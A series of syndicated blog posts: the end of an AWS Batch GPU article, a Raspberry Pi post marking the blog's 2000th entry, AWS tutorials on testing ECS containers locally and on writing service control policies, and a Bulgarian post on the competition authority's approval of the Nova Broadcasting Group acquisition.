14:34:45     INFO:root:Epoch[19] Validation-accuracy=0.983579

Summary

As you can see, after AWS Batch launched the instance, the job took slightly more than two minutes to run. I spent roughly five minutes from start to finish. That was much faster than the time that I was previously spending just to configure the AMI. Using the AWS CLI, one of the AWS SDKs, or AWS CloudFormation, the same environment could be created even faster.

From a training point of view, I lost on the validation accuracy, as the results obtained using the LeNet CNN are higher than when using an MLP network. On the other hand, my job was faster, with a time cost of 1.6 seconds in average for each epoch. As the software stack evolves, and increased hardware capabilities come along, these numbers keep improving, but that shouldn’t mean extra complexity. Using managed primitives like the one presented in this post enables a simpler implementation.

I encourage you to test this example and see for yourself how just a few clicks or commands lets you start running GPU jobs with AWS Batch. Then, it is just a matter of replacing the Docker image that I used for one with the framework of your choice, TensorFlow, Caffe, PyTorch, Keras, etc. Start to run your GPU-enabled machine learning, deep learning, computational fluid dynamics (CFD), seismic analysis, molecular modeling, genomics, or computational finance workloads. It’s faster and easier than ever.

If you decide to give it a try, have any doubt or just want to let me know what you think about this post, please write in the comments section!

Eight years, 2000 blog posts

Post Syndicated from Liz Upton original https://www.raspberrypi.org/blog/eight-years-2000-blog-posts/

Today’s a bit of a milestone for us: this is the 2000th post on this blog.

Why does a computer company have a blog? When did it start, who writes it, and where does the content come from? And don’t you have sore fingers? All of these are good questions: I’m here to answer them for you.

The first ever Raspberry Pi blog post

Marital circumstances being what they are, I had a front-row view of everything that was going on at Raspberry Pi, right from the original conversations that kicked the project off in 2009. In 2011, when development was still being done on Eben’s and my kitchen table, we met with sudden and slightly alarming fame when Rory Cellan Jones from the BBC shot a short video of a prototype Raspberry Pi and blogged about it – his post went viral. I was working as a freelance journalist and editor at the time, but realised that we weren’t going to get a better chance to kickstart a community, so I dropped my freelance work and came to work full-time for Raspberry Pi.

Setting up an instantiation of WordPress so we could talk to all Rory’s readers, each of whom decided we’d promised we’d make them a $25 computer, was one of the first orders of business. We could use the WordPress site to announce news, and to run a sort of devlog, which is what became this blog; back then, many of our blog posts were about the development of the original Raspberry Pi.

It was a lovely time to be writing about what we do, because we could be very open about the development process and how we were moving towards launch in a way that sadly, is closed to us today. (If we’d blogged about the development of Raspberry Pi 3 in the detail we’d blogged about Raspberry Pi 1, we’d not only have been handing sensitive and helpful commercial information to the large number of competitor organisations that have sprung up like mushrooms since that original launch; but you’d also all have stopped buying Pi 2 in the run-up, starving us of the revenue we need to do the development work.)

Once Raspberry Pis started making their way into people’s hands in early 2012, I realised there was something else that it was important to share: news about what new users were doing with their Pis. And I will never, ever stop being shocked at the applications of Raspberry Pi that you come up with. Favourites from over the years? The paludarium’s still right up there (no, I didn’t know what a paludarium was either when I found out about it); the cucumber sorter’s brilliant; and the home-brew artificial pancreas blows my mind. I’ve a particular soft spot for musical projects (which I wish you guys would comment on a bit more so I had an excuse to write about more of them).



As we’ve grown, my job has grown too, so I don’t write all the posts here like I used to. I oversee press, communications, marketing and PR for Raspberry Pi Trading now, working with a team of writers, editors, designers, illustrators, photographers, videographers and managers – it’s very different from the days when the office was that kitchen table. Alex Bate, our magisterial Head of Social Media, now writes a lot of what you see on this blog, but it’s always a good day for me when I have time to pitch in and write a post.

I’d forgotten some of the early stuff before looking at 2011’s blog posts to jog my memory as I wrote today’s. What were we thinking when we decided to ship without GPIO pins soldered on? (Happily for the project and for the 25,000,000 Pi owners all over the world in 2019, we changed our minds before we finally launched.) Just how many days in aggregate did I spend stuffing envelopes with stickers at £1 a throw to raise some early funds to get the first PCBs made? (I still have nightmares about the paper cuts.) And every time I think I’m having a bad day, I need to remember that this thing happened, and yet everything was OK again in the end. (The backs of my hands have gone all prickly just thinking about it.) Now I think about it, the Xenon Death Flash happened too. We also survived that.

At the bottom of it all, this blog has always been about community. It’s about sharing what we do, what you do, and making links between people all over the world who have this little machine in common. The work you do telling people about Raspberry Pi, putting it into your own projects, and supporting us by buying the product doesn’t just help us make hardware: every penny we make funds the Raspberry Pi Foundation’s charitable work, helps kids on every continent to learn the skills they need to make their own futures better, and, we think, makes the world a better place. So thank you. As long as you keep reading, we’ll keep writing.

The post Eight years, 2000 blog posts appeared first on Raspberry Pi.

A Guide to Locally Testing Containers with Amazon ECS Local Endpoints and Docker Compose

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/a-guide-to-locally-testing-containers-with-amazon-ecs-local-endpoints-and-docker-compose/

This post is contributed by Wesley Pettit, Software Engineer at AWS.

As more companies adopt containers, developers need easy, powerful ways to test their containerized applications locally, before they deploy to AWS. Today, the containers team is releasing the first tool dedicated to this: Amazon ECS Local Container Endpoints. This is part of an ongoing open source project designed to improve the local development process for Amazon Elastic Container Service (ECS) and AWS Fargate.  This first step allows you to locally simulate the ECS Task Metadata V2 and V3 endpoints and IAM Roles for Tasks.

In this post, I will walk you through the following testing scenarios enabled by Amazon ECS Local Endpoints and Docker Compose:

  •  Testing a container that needs credentials to interact with AWS Services
  • Testing a container which uses Task Metadata
  • Testing a multi-container app which uses the awsvpc or host network mode on Docker For Mac and Docker For Windows.
  • Testing multiple containerized applications using local service discovery

Setup

Your local testing toolkit consists of Docker, Docker Compose, and awslabs/amazon-ecs-local-container-endpoints.  To follow along with the scenarios in this post, you will need to have locally installed the Docker Daemon, the Docker Command Line, and Docker Compose.

Once you have the dependencies installed, create a Docker Compose file called docker-compose.yml. The Compose file defines the settings needed to run your application. If you have never used Docker Compose before, check out Docker’s Getting Started with Compose tutorial. This example file defines a web application:

version: "2"
services:
  app:
    build:
      # Build an image from the Dockerfile in the current directory
      context: .
    ports:
      - 8080:80
    environment:
      PORT: "80"

Make sure to save your docker-compose.yml file: it will be needed for the rest of the scenarios.

Our First Scenario: Testing a container which needs credentials to interact with AWS Services

Say I have a container which I want to test locally that needs AWS credentials. I could accomplish this by providing credentials as environment variables on the container, but that would be a bad practice. Instead, I can use Amazon ECS Local Endpoints to safely vend credentials to a local container.

The following Docker Compose override file template defines a single container that will use credentials. This should be used along with the docker-compose.yml file you created in the setup section. Name this file docker-compose.override.yml, (Docker Compose will know to automatically use both of the files).

Your docker-compose.override.yml file should look like this:

version: "2"
networks:
    # This special network is configured so that the local metadata
    # service can bind to the specific IP address that ECS uses
    # in production
    credentials_network:
        driver: bridge
        ipam:
            config:
                - subnet: "169.254.170.0/24"
                  gateway: 169.254.170.1
services:
    # This container vends credentials to your containers
    ecs-local-endpoints:
        # The Amazon ECS Local Container Endpoints Docker Image
        image: amazon/amazon-ecs-local-container-endpoints
        volumes:
          # Mount /var/run so we can access docker.sock and talk to Docker
          - /var/run:/var/run
          # Mount the shared configuration directory, used by the AWS CLI and AWS SDKs
          # On Windows, this directory can be found at "%UserProfile%\.aws"
          - $HOME/.aws/:/home/.aws/
        environment:
          # define the home folder; credentials will be read from $HOME/.aws
          HOME: "/home"
          # You can change which AWS CLI Profile is used
          AWS_PROFILE: "default"
        networks:
            credentials_network:
                # This special IP address is recognized by the AWS SDKs and AWS CLI 
                ipv4_address: "169.254.170.2"
                
    # Here we reference the application container that we are testing
    # You can test multiple containers at a time, simply duplicate this section
    # and customize it for each container, and give it a unique IP in 'credentials_network'.
    app:
        depends_on:
            - ecs-local-endpoints
        networks:
            credentials_network:
                ipv4_address: "169.254.170.3"
        environment:
          AWS_DEFAULT_REGION: "us-east-1"
          AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/creds"

To test your container locally, run:

docker-compose up

Your container will now be running and will be using temporary credentials obtained from your default AWS Command Line Interface Profile.

NOTE: You should not use your production credentials locally. If you provide the ecs-local-endpoints with an AWS Profile that has access to your production account, then your application will be able to access/modify production resources from your local testing environment. We recommend creating separate development and production accounts.

How does this work?

In this example, we have created a User Defined Docker Bridge Network which allows the Local Container Endpoints to listen at the IP Address 169.254.170.2. We have also defined the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI on our application container. The AWS SDKs and AWS CLI are all designed to retrieve credentials by making HTTP requests to  169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI. When containers run in production on ECS, the ECS Agent vends credentials to containers via this endpoint; this is how IAM Roles for Tasks is implemented.

Amazon ECS Local Container Endpoints vends credentials to containers the same way as the ECS Agent does in production. In this case, it vends temporary credentials obtained from your default AWS CLI Profile. It can do that because it mounts your .aws folder, which contains credentials and configuration for the AWS CLI.

Gotchas: Things to Keep in Mind when using ECS Local Container Endpoints and Docker Compose

  • Make sure every container in the credentials_network has a unique IP Address. If you don’t do this, Docker Compose can incorrectly try to assign 169.254.170.2 (the ecs-local-endpoints container IP) to one of the application containers. This will cause your Compose project to fail to start.
  • On Windows, replace $HOME/.aws/ in the volumes declaration for the endpoints container with the correct location of the AWS CLI configuration directory, as explained in the documentation.
  • Notice that the application container is named ‘app’ in both of the example file templates. You must make sure the container names match between your docker-compose.yml and docker-compose.override.yml. When you run docker-compose up, the files will be merged. The settings in each file for each container will be merged, so it’s important to use consistent container names between the two files.

Scenario Two: Testing using Task IAM Role credentials

The endpoints container image can also vend credentials from an IAM Role; this allows you to test your application locally using a Task IAM Role.

NOTE: You should not use your production Task IAM Role locally. Instead, create a separate testing role, with equivalent permissions scoped to testing resources. Modifying the trust boundary of a production role will expand its scope.

In order to use a Task IAM Role locally, you must modify its trust policy. First, get the ARN of the IAM user defined by your default AWS CLI Profile (replace default with a different Profile name if needed):

aws --profile default sts get-caller-identity

Then modify your Task IAM Role so that its trust policy includes the following statement. You can find instructions for modifying IAM Roles in the IAM Documentation.

    {
      "Effect": "Allow",
      "Principal": {
        "AWS": <ARN of the user found with get-caller-identity>
      },
      "Action": "sts:AssumeRole"
    }

To use your Task IAM Role in your docker compose file for local testing, simply change the value of the AWS container credentials relative URI environment variable on your application container:

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/role/<name of your role>"

For example, if your role is named ecs_task_role, then the environment variable should be set to "/role/ecs_task_role". That is all that is required; the ecs-local-endpoints container will now vend credentials obtained from assuming the task role. You can use this to validate that the permissions set on your Task IAM Role are sufficient to run your application.

Scenario Three: Testing a Container that uses Task Metadata endpoints

The Task Metadata endpoints are useful; they allow a container running on ECS to obtain information about itself at runtime. This enables many use cases; my favorite is that it allows you to obtain container resource usage metrics, as shown by this project.

With Amazon ECS Local Container Endpoints, you can locally test applications that use the Task Metadata V2 or V3 endpoints. If you want to use the V2 endpoint, the Docker Compose template shown at the beginning of this post is sufficient. If you want to use V3, simply add another environment variable to each of your application containers:

ECS_CONTAINER_METADATA_URI: "http://169.254.170.2/v3"

This is the environment variable defined by the V3 metadata spec.

Scenario Four: Testing an Application that uses the AWSVPC network mode

Thus far, all or our examples have involved testing containers in a bridge network. But what if you have an application that uses the awsvpc network mode. Can you test these applications locally?

Your local development machine will not have Elastic Network Interfaces. If your ECS Task consists of a single container, then the bridge network used in previous examples will suffice. However, if your application consists of multiple containers that need to communicate, then awsvpc differs significantly from bridge. As noted in the AWS Documentation:

“containers that belong to the same task can communicate over the localhost interface.”

This is one of the benefits of awsvpc; it makes inter-container communication easy. To simulate this locally, a different approach is needed.

If your local development machine is running linux, then you are in luck. You can test your containers using the host network mode, which will allow them to all communicate over localhost. Instructions for how to set up iptables rules to allow your containers to receive credentials and metadata is documented in the ECS Local Container Endpoints Project README.

If you are like me, and do most of your development on Windows or Mac machines, then this option will not work. Docker only supports host mode on Linux. Luckily, this section describes a workaround that will allow you to locally simulate awsvpc on Docker For Mac or Docker For Windows. This also partly serves as a simulation of the host network mode, in the sense that all of your containers will be able to communicate over localhost (from a local testing standpoint, host and awsvpc are functionally the same, the key requirement is that all containers share a single network interface).

In ECS, awsvpc is implemented by first launching a single container, which we call the ‘pause container‘. This container is attached to the Elastic Network Interface, and then all of the containers in your task are launched into the pause container’s network namespace. For the local simulation of awsvpc, a similar approach will be used.

First, create a Dockerfile with the following contents for the ‘local’ pause container.

FROM amazonlinux:latest
RUN yum install -y iptables

CMD iptables -t nat -A PREROUTING -p tcp -d 169.254.170.2 --dport 80 -j DNAT --to-destination 127.0.0.1:51679 \
 && iptables -t nat -A OUTPUT -d 169.254.170.2 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 51679 \
 && iptables-save \
 && /bin/bash -c 'while true; do sleep 30; done;'

This Dockerfile defines a container image which sets some iptables rules and then sleeps forever. The routing rules will allow requests to the credentials and metadata service to be forwarded from 169.254.170.2:80 to localhost:51679, which is the port ECS Local Container Endpoints will listen at in this setup.

Build the image:

docker build -t local-pause:latest .

Now, edit your docker-compose.override.yml file so that it looks like the following:

version: "2"
services:
    ecs-local-endpoints:
        image: amazon/amazon-ecs-local-container-endpoints
        volumes:
          - /var/run:/var/run
          - $HOME/.aws/:/home/.aws/
        environment:
          ECS_LOCAL_METADATA_PORT: "51679"
          HOME: "/home"
        network_mode: container:local-pause

    app:
        depends_on:
            - ecs-local-endpoints
        network_mode: container:local-pause
        environment:
          ECS_CONTAINER_METADATA_URI: "http://169.254.170.2/v3/containers/app"
          AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/creds"

Several important things to note:

  • ECS_LOCAL_METADATA_PORT is set to 51679; this is the port that was used in the iptables rules.
  • network_mode is set to container:local-pause for all the containers, which means that they will use the networking stack of a container named local-pause.
  • ECS_CONTAINER_METADATA_URI is set to http://169.254.170.2/ v3/containers/app. This is important. In bridge mode, the local endpoints container can determine which container a request came from using the IP Address in the request. In simulated awsvpc, this will not work, since all of the containers share the same IP Address. Thus, the endpoints container supports using the container name in the request URI so that it can identify which container the request came from. In this case, the container is named app, so app is appended to the value of the environment variable. If you copy the app container configuration to add more containers to this compose file, make sure you update the value of ECS_CONTAINER_METADATA_URI for each new container.
  • Remove any port declarations from your docker-compose.yml file. These are not valid with the network_mode settings that you will be using. The text below explains how to expose ports in this simulated awsvpc network mode.

Before you run the compose file, you must launch the local-pause container. This container can not be defined in the Docker Compose file, because in Compose there is no way to define that one container must be running before all the others. You might think that the depends_on setting would work, but this setting only determines the order in which containers are started. It is not a robust solution for this case.

One key thing to note; any ports used by your application containers must be defined on the local-pause container. You can not define ports directly on your application containers because their network mode is set to container:local-pause. This is a limitation imposed by Docker.

Assuming that your application containers need to expose ports 8080 and 3306 (replace these with the actual ports used by your applications), run the local pause container with this command:

docker run -d -p 8080:8080 -p 3306:3306 --name local-pause --cap-add=NET_ADMIN local-pause

Then, simply run the docker compose files, and you will have containers which share a single network interface and have access to credentials and metadata!

Scenario Five: Testing multiple applications with local Service Discovery

Thus far, all of the examples have focused on running a single containerized application locally. But what if you want to test multiple applications which run as separate Tasks in production?

Docker Compose allows you to set up DNS aliases for your containers. This allows them to talk to each other using a hostname.

For this example, return to the compose override file with a bridge network shown in scenarios one through three. Here is a docker-compose.override.yml file which implements a simple scenario. There are two applications, frontend and backend. Frontend needs to make requests to backend.

version: "2"
networks:
    credentials_network:
        driver: bridge
        ipam:
            config:
                - subnet: "169.254.170.0/24"
                  gateway: 169.254.170.1
services:
    # This container vends credentials to your containers
    ecs-local-endpoints:
        # The Amazon ECS Local Container Endpoints Docker Image
        image: amazon/amazon-ecs-local-container-endpoints
        volumes:
          - /var/run:/var/run
          - $HOME/.aws/:/home/.aws/
        environment:
          HOME: "/home"
          AWS_PROFILE: "default"
        networks:
            credentials_network:
                ipv4_address: "169.254.170.2"
                aliases:
                    - endpoints # settings for the containers which you are testing
    frontend:
        image: amazonlinux:latest
        command: /bin/bash -c 'while true; do sleep 30; done;'
        depends_on:
            - ecs-local-endpoints
        networks:
            credentials_network:
                ipv4_address: "169.254.170.3"
        environment:
          AWS_DEFAULT_REGION: "us-east-1"
          AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/creds"
    backend:
        image: nginx
        networks:
            credentials_network:
                # define an alias for service discovery
                aliases:
                    - backend
                ipv4_address: "169.254.170.4"

With these settings, the frontend container can find the backend container by making requests to http://backend.

Conclusion

In this tutorial, you have seen how to use Docker Compose and awslabs/amazon-ecs-local-container-endpoints to test your Amazon ECS and AWS Fargate applications locally before you deploy.

You have learned how to:

  • Construct docker-compose.yml and docker-compose.override.yml files.
  • Test a container locally with temporary credentials from a local AWS CLI Profile.
  • Test a container locally using credentials from an ECS Task IAM Role.
  • Test a container locally that uses the Task Metadata Endpoints.
  • Locally simulate the awsvpc network mode.
  • Use Docker Compose service discovery to locally test multiple dependent applications.

To follow along with new developments to the local development project, you can head to the public AWS Containers Roadmap on GitHub. If you have questions, comments, or feedback, you can let the team know there!

 

How to use service control policies to set permission guardrails across accounts in your AWS Organization

Post Syndicated from Michael Switzer original https://aws.amazon.com/blogs/security/how-to-use-service-control-policies-to-set-permission-guardrails-across-accounts-in-your-aws-organization/

AWS Organizations provides central governance and management for multiple accounts. Central security administrators use service control policies (SCPs) with AWS Organizations to establish controls that all IAM principals (users and roles) adhere to. Now, you can use SCPs to set permission guardrails with the fine-grained control supported in the AWS Identity and Access Management (IAM) policy language. This makes it easier for you to fine-tune policies to meet the precise requirements of your organization’s governance rules.

Now, using SCPs, you can specify Conditions, Resources, and NotAction to deny access across accounts in your organization or organizational unit. For example, you can use SCPs to restrict access to specific AWS Regions, or prevent your IAM principals from deleting common resources, such as an IAM role used for your central administrators. You can also define exceptions to your governance controls, restricting service actions for all IAM entities (users, roles, and root) in the account except a specific administrator role.

To implement permission guardrails using SCPs, you can use the new policy editor in the AWS Organizations console. This editor makes it easier to author SCPs by guiding you to add actions, resources, and conditions. In this post, I review SCPs, walk through the new capabilities, and show how to construct an example SCP you can use in your organization today.

Overview of Service Control Policy concepts

Before I walk through some examples, I’ll review a few features of SCPs and AWS Organizations.

SCPs offer central access controls for all IAM entities in your accounts. You can use them to enforce the permissions you want everyone in your business to follow. Using SCPs, you can give your developers more freedom to manage their own permissions because you know they can only operate within the boundaries you define.

You create and apply SCPs through AWS Organizations. When you create an organization, AWS Organizations automatically creates a root, which forms the parent container for all the accounts in your organization. Inside the root, you can group accounts in your organization into organizational units (OUs) to simplify management of these accounts. You can create multiple OUs within a single organization, and you can create OUs within other OUs to form a hierarchical structure. You can attach SCPs to the organization root, OUs, and individual accounts. SCPs attached to the root and OUs apply to all OUs and accounts inside of them.

SCPs use the AWS Identity and Access Management (IAM) policy language; however, they do not grant permissions. SCPs enable you set permission guardrails by defining the maximum available permissions for IAM entities in an account. If a SCP denies an action for an account, none of the entities in the account can take that action, even if their IAM permissions allow them to do so. The guardrails set in SCPs apply to all IAM entities in the account, which include all users, roles, and the account root user.

Policy Elements Available in SCPs

The table below summarizes the IAM policy language elements available in SCPs. You can read more about the different IAM policy elements in the IAM JSON Policy Reference.

The Supported Statement Effect column describes the effect type you can use with each policy element in SCPs.

Policy ElementDefinitionSupported Statement Effect
StatementMain element for a policy. Each policy can have multiple statements.Allow, Deny
Sid(Optional) Friendly name for the statement.Allow, Deny
EffectDefine whether a SCP statement allows or denies actions in an account.Allow, Deny
ActionList the AWS actions the SCP applies to.Allow, Deny
NotAction (New)(Optional) List the AWS actions exempt from the SCP. Used in place of the Action element.Deny
Resource (New)List the AWS resources the SCP applies to.Deny
Condition (New)(Optional) Specify conditions for when the statement is in effect.Deny

Note: Some policy elements are only available in SCPs that deny actions.

You can use the new policy elements in new or existing SCPs in your organization. In the next section, I use the new elements to create a SCP using the AWS Organizations console.

Create an SCP in the AWS Organizations console

In this section, you’ll create an SCP that restricts IAM principals in accounts from making changes to a common administrative IAM role created in all accounts in your organization. Imagine your central security team uses these roles to audit and make changes to AWS settings. For the purposes of this example, you have a role in all your accounts named AdminRole that has the AdministratorAccess managed policy attached to it. Using an SCP, you can restrict all IAM entities in the account from modifying AdminRole or its associated permissions. This helps you ensure this role is always available to your central security team. Here are the steps to create and attach this SCP.

  1. Ensure you’ve enabled all features in AWS Organizations and SCPs through the AWS Organizations console.
  2. In the AWS Organizations console, select the Policies tab, and then select Create policy.

    Figure 1: Select "Create policy" on the "Policies" tab

    Figure 1: Select “Create policy” on the “Policies” tab

  3. Give your policy a name and description that will help you quickly identify it. For this example, I use the following name and description.
    • Name: DenyChangesToAdminRole
    • Description: Prevents all IAM principals from making changes to AdminRole.

     

    Figure 2: Give the policy a name and description

    Figure 2: Give the policy a name and description

  4. The policy editor provides you with an empty statement in the text editor to get started. Position your cursor inside the policy statement. The editor detects the content of the policy statement you selected, and allows you to add relevant Actions, Resources, and Conditions to it using the left panel.

    Figure 3: SCP editor tool

    Figure 3: SCP editor tool

  5. Change the Statement ID to describe what the statement does. For this example, I reused the name of the policy, DenyChangesToAdminRole, because this policy has only one statement.

    Figure 4: Change the Statement ID

    Figure 4: Change the Statement ID

  6. Next, add the actions you want to restrict. Using the left panel, select the IAM service. You’ll see a list of actions. To learn about the details of each action, you can hover over the action with your mouse. For this example, we want to allow principals in the account to view the role, but restrict any actions that could modify or delete it. We use the new NotAction policy element to deny all actions except the view actions for the role. Select the following view actions from the list:
    • GetContextKeysForPrincipalPolicy
    • GetRole
    • GetRolePolicy
    • ListAttachedRolePolicies
    • ListInstanceProfilesForRole
    • ListRolePolicies
    • ListRoleTags
    • SimulatePrincipalPolicy
  7. Now position your cursor at the Action element and change it to NotAction. After you perform the steps above, your policy should look like the one below.

    Figure 5: An example policy

    Figure 5: An example policy

  8. Next, apply these controls to only the AdminRole role in your accounts. To do this, use the Resource policy element, which now allows you to provide specific resources.
      1. On the left, near the bottom, select the Add Resources button.
      2. In the prompt, select the IAM service from the dropdown menu.
      3. Select the role as the resource type, and then type “arn:aws:iam::*:role/AdminRole” in the resource ARN prompt.
      4. Select Add resource.

    Note: The AdminRole has a common name in all accounts, but the account IDs will be different for each individual role. To simplify the policy statement, use the * wildcard in place of the account ID to account for all roles with this name regardless of the account.

  9. Your policy should look like this:
    
    {    
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "DenyChangesToAdminRole",
          "Effect": "Deny",
          "NotAction": [
            "iam:GetContextKeysForPrincipalPolicy",
            "iam:GetRole",
            "iam:GetRolePolicy",
            "iam:ListAttachedRolePolicies",
            "iam:ListInstanceProfilesForRole",
            "iam:ListRolePolicies",
            "iam:ListRoleTags",
            "iam:SimulatePrincipalPolicy"
          ],
          "Resource": [
            "arn:aws:iam::*:role/AdminRole"
          ]
        }
      ]
    }
    

  10. Select the Save changes button to create your policy. You can see the new policy in the Policies tab.

    Figure 6: The new policy on the “Policies” tab

    Figure 6: The new policy on the “Policies” tab

  11. Finally, attach the policy to the AWS account where you want to apply the permissions.

When you attach the SCP, it prevents changes to the role’s configuration. The central security team that uses the role might want to make changes later on, so you may want to allow the role itself to modify the role’s configuration. I’ll demonstrate how to do this in the next section.

Grant an exception to your SCP for an administrator role

In the previous section, you created a SCP that prevented all principals from modifying or deleting the AdminRole IAM role. Administrators from your central security team may need to make changes to this role in your organization, without lifting the protection of the SCP. In this next example, I build on the previous policy to show how to exclude the AdminRole from the SCP guardrail.

  1. In the AWS Organizations console, select the Policies tab, select the DenyChangesToAdminRole policy, and then select Policy editor.
  2. Select Add Condition. You’ll use the new Condition element of the policy, using the aws:PrincipalARN global condition key, to specify the role you want to exclude from the policy restrictions.
  3. The aws:PrincipalARN condition key returns the ARN of the principal making the request. You want to ignore the policy statement if the requesting principal is the AdminRole. Using the StringNotLike operator, assert that this SCP is in effect if the principal ARN is not the AdminRole. To do this, fill in the following values for your condition.
    1. Condition key: aws:PrincipalARN
    2. Qualifier: Default
    3. Operator: StringNotEquals
    4. Value: arn:aws:iam::*:role/AdminRole
  4. Select Add condition. The following policy will appear in the edit window.
    
    {    
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "DenyChangesToAdminRole",
          "Effect": "Deny",
          "NotAction": [
            "iam:GetContextKeysForPrincipalPolicy",
            "iam:GetRole",
            "iam:GetRolePolicy",
            "iam:ListAttachedRolePolicies",
            "iam:ListInstanceProfilesForRole",
            "iam:ListRolePolicies",
            "iam:ListRoleTags"
          ],
          "Resource": [
            "arn:aws:iam::*:role/AdminRole"
          ],
          "Condition": {
            "StringNotLike": {
              "aws:PrincipalARN":"arn:aws:iam::*:role/AdminRole"
            }
          }
        }
      ]
    }
    
    

  5. After you validate the policy, select Save. If you already attached the policy in your organization, the changes will immediately take effect.

Now, the SCP denies all principals in the account from updating or deleting the AdminRole, except the AdminRole itself.

Next steps

You can now use SCPs to restrict access to specific resources, or define conditions for when SCPs are in effect. You can use the new functionality in your existing SCPs today, or create new permission guardrails for your organization. I walked through one example in this blog post, and there are additional use cases for SCPs that you can explore in the documentation. Below are a few that we have heard from customers that you may want to look at.

  • Account may only operate in certain AWS regions (example)
  • Account may only deploy certain EC2 instance types (example)
  • Account requires MFA is enabled before taking an action (example)

You can start applying SCPs using the AWS Organizations console, CLI, or API. See the Service Control Policies Documentation or the AWS Organizations Forums for more information about SCPs, how to use them in your organization, and additional examples.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Michael Switzer

Mike is the product manager for the Identity and Access Management service at AWS. He enjoys working directly with customers to identify solutions to their challenges, and using data-driven decision making to drive his work. Outside of work, Mike is an avid cyclist and outdoorsperson. He holds a master’s degree in computational mathematics from the University of Washington.

КЗК разреши придобиването на Нова Броудкастинг Груп

Post Syndicated from nellyo original https://nellyo.wordpress.com/2019/03/22/cpc-nova/

Адванс Медиа Груп, търговско дружество, свързано с К.Домусчиев и Г.Домусчиев, има намерение да придобие едноличен контрол върху „Нова Броудкастинг Груп“ АД.

В КЗК е постъпило искане да направи оценка на сделката и да постанови решение, че настоящата сделка не представлява концентрация; или да постанови, че концентрацията не попада в обхвата на чл. 24 от ЗЗК; или да разреши концентрацията,
тъй като тя не води до установяване или засилване на господстващо положение, което значително би попречило на ефективната конкуренция на съответния пазар.

Произнасянето на КЗК е крайно любопитно поради скорошното решение, с което се отказва на Келнер да придобие Нова Броудкастинг Груп –

Предвид характеристиките на всеки един от съответните пазари в медийния сектор е установено, че придобиваната група разполага със значителен финансов и организационен ресурс, възможност за реализиране на икономии от мащаба и обхвата, и утвърден имидж. Значителният брой средства за масова информация, с които ще разполага обединената група, ще й даде съществено предимство пред останалите участници, предоставящи медийни услуги.

При анализа на нотифицираната сделка Комисията отчита водещите позиции на придобиваното предприятие в областта на медийните услуги, което от своя странаповдига основателни опасения за ефекта от сделка върху конкурентна среда на горепосочените пазари, както и хоризонтално припокриване на дейностите на участниците в концентрацията на пазара на онлайн търговия.

По този начин, участниците в концентрацията биха имали стимул и реална възможност да променят своята търговска политика под различни форми, изразяващи се в ограничаване на достъпа, повишаване на цените или промяна в условията по сключените договори. С оглед на гореизложеното и предвид значителния опит на придобиващото дружество и неговите инвестиционни намерения се създават предпоставки сделката да доведе до установяване или засилване на господстващо положение, което значително би възпрепятствало конкуренцията на съответните пазари. Такова поведение би ограничило и нарушило не само конкуренцията на пазара, но и интересите на крайните потребители, предвид обществената значимост на медиите.

КЗК оповести на 21 март 2019 решението си, с което – този път – разрешава сделката:

Реално осъществяваната от „Нова“ дейност включва:

  • създаване на телевизионно съдържание за собствена употреба, както и придобиване на права за разпространение на телевизионно съдържание;
  • разпространение на телевизионно съдържание – „Нова“ създава и разпространява 7 (седем) телевизионни програми с национален обхват: „Нова телевизия“; „Диема“; „Кино Нова“; „Диема Фемили“; „Нова спорт“; „Диема спорт“; „Диема спорт 2“;
  • телевизионна реклама – „Нова“ продава достъп до аудиторията си посредством излъчване на рекламни материали на рекламодатели и рекламни агенции в посочените телевизионни програми;
  • поддържане на интернет сайтове, предоставящи основно информация за програмите на ТВ-каналите, които оперира, както и възможност за гледане на част от излъчваните предавания в Интернет – https://nova.bg/, https://play.nova.bg/,
    https://diemaxtra.nova.bg/, https://play.diemaxtra.bg/, http://www.diema.bg, https://kino.nova.bg/, https://diemafamily.nova.bg/. Допълнително, Нова е разработила услугата Play DiemaXtra, която се състои от интернет сайт и мобилно приложение, даващи
    възможност за линейно гледане на пакета от телевизионните канали Диема Спорт и Диема Спорт 2, както и на отделни спортни събития по избор на потребителите (PPV);
  • предоставяне на услуги (…..)*.
    Дружеството „Атика Ева“ АД, контролирано от „Нова Броудкастинг Груп“ АД, е е специализирано в издаването на месечните списания: Еva, Playboy, Esquire, Joy, Grazia, OK „Атика Ева“ ООД, чрез които извършва издателска дейност, търговия с
    печатни произведения, реклама в печатни издания. Дружеството също така администрира интернет сайтове на част от посочените списания, на които самостоятелно продава интернет реклама.
    Другите предприятия, контролирани от „Нова Броудкастинг Груп“ АД – чрез „Нет Инфо“ АД, предоставят следните ключови продукти и услуги:
  • уеб-базирана електронна поща (www.abv.bg), която позволява на крайните потребители да отворят електронни пощенски кутии и да обменят пощенски съобщения; сайтът http://www.abv.bg също така позволява на крайните потребители да си съставят адресен указател и да общуват с други потребители във виртуални чат стаи и онлайн форуми;
  • електронни директории – платформа за организиране, съхранение и споделяне на файлове онлайн – http://www.dox.bg;
  • търсене – в сътрудничество с международния доставчик на тази услуга, Google, компанията предоставя уеб-търсене на основните си страници – http://www.abv.bg и http://www.gbg.bg;
  • новини и информация – Нет Инфо предоставя цифрови новини и информация чрез новинарския сайт http://www.vesti.bg, специализирания спортен новинарски сайт – http://www.gong.bg, сайта за прогнозата за времето http://www.sinoptik.bg, сайта за финансова
    информация http://www.pariteni.bg и сайта, посветен на модерната жена http://www.edna.bg;
  • обяви за автомобили – http://www.carmarket.bg дава възможност на потребителите да публикуват и разглеждат обяви за продажба на автомобили;
  • проверка на цени и сравнение на продукти – чрез сайта http://www.sravni.bg интернет потребителите могат да сравняват цените на продукти, продавани в различни онлайн магазини.

Пазари, върху които сделката ще окаже въздействие.
